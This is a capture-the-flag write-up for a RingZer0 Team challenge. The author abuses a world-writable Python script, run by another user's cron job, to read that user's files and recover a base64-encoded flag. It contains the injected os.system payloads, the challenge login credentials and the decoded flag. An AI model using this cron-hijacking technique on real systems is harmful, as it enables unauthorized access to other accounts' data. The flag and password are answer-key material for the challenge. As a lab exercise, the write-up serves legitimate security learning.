Get access to the cypher account.

User: morpheus
Password: VNZDDLq2x9qXCzVdABbR1HOtz

root@Kali:~# ssh -p 13375 morpheus@for01.ringzer0team.com
morpheus@for01.ringzer0team.com's password: 

         _                             ____  __                     
   _____(_)___  ____ _____  ___  _____/ __ \/ /____  ____ _____ ___ 
  / ___/ / __ \/ __ `/_  / / _ \/ ___/ / / / __/ _ \/ __ `/ __ `__ \
 / /  / / / / / /_/ / / /_/  __/ /  / /_/ / /_/  __/ /_/ / / / / / /
/_/  /_/_/ /_/\__, / /___/\___/_/   \____/\__/\___/\__,_/_/ /_/ /_/ 
             /____/                                                 
                                      _ _             ___ _____ ___ 
                             ___ _ _ | (_)_ _  ___   / __|_   _| __|
                            / _ \ ' \| | | ' \/ -_) | (__  | | | _| 
                            \___/_||_|_|_|_||_\___|  \___| |_| |_|  
                                                                    

You have mail.
Last login: Thu Jun 30 09:59:35 2016 from 129.176.197.23

In one of the backup files, we see that cypher runs a cron job:

morpheus@forensics:/$ cd /backup
morpheus@forensics:/backup$ ls
3dab3277410dddca016834f91d172027  776d27d2a429e63bbc3cb29183417bb2  c074fa6ec17bb35e168366c43cf4cd19  ca584b15ae397a9ad45b1ff267b55796
morpheus@forensics:/backup$ strings 3dab3277410dddca016834f91d172027 | grep cypher
Mar 12 22:01:58 forensics crontab[1662]: (cypher) BEGIN EDIT (cypher)
Mar 12 22:02:27 forensics crontab[1662]: (cypher) REPLACE (cypher)
Mar 12 22:02:27 forensics crontab[1662]: (cypher) END EDIT (cypher)
Mar 12 22:03:01 forensics /USR/SBIN/CRON[1682]: (cypher) CMD (python /tmp/Gathering.py)
Mar 12 22:06:01 forensics /USR/SBIN/CRON[1857]: (cypher) CMD (python /tmp/Gathering.py)
Mar 12 22:09:01 forensics /USR/SBIN/CRON[2269]: (cypher) CMD (python /tmp/Gathering.py)


The file /tmp/Gathering.py is writable by us and is used in a cron job for cypher

Edit the /tmp/Gathering.py file to contain:

import os
os.system('ls -al /home/cypher > /var/tmp/file; chmod 777 /var/tmp/file;')

this first looks at the files in the directory for something useful.  
Put the file in a location we can access and with permissions that allow us to view the file.

Once the cron job runs, we see the following:

morpheus@forensics:/var/tmp$ more file
total 44
drwxr-x---  2 cypher cypher 4096 Mar 16  2014 .
drwxr-xr-x 10 root   root   4096 Jun 12  2014 ..
-rw-------  1 root   root      1 Mar 12  2014 .bash_history
-rw-r-----  1 cypher cypher  220 Dec 29  2012 .bash_logout
-rw-r-----  1 cypher cypher 3414 Mar  4  2014 .bashrc
-rwxr-x---  1 cypher cypher  177 Mar 16  2014 cronjob.sh
-rw-r-----  1 cypher cypher   52 Mar 12  2014 flag.txt
-rwxrwxrwx  1 cypher cypher 8027 Apr  8 22:08 info.txt
-rw-r-----  1 cypher cypher  675 Dec 29  2012 .profile
-rw-r-----  1 cypher cypher   19 Mar  4  2014 .vimrc

Bingo!  let's tell the cron job (Gathering.py file) to let us view the file "flag.txt":

import os
os.system('cat flag.txt > /var/tmp/file; chmod 777 /var/tmp/file')

morpheus@forensics:/var/tmp$ more file 
BASE ?
RkxBRy1weXMzZ2ZjenQ5cERrRXoyaW8wUHdkOEtOego=
morpheus@forensics:/var/tmp$ python
Python 2.7.3 (default, Mar 13 2014, 11:03:55) 
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import base64
>>> base64.b64decode("RkxBRy1weXMzZ2ZjenQ5cERrRXoyaW8wUHdkOEtOego=")
'FLAG-pys3gfczt9pDkEz2io0Pwd8KNz\n'

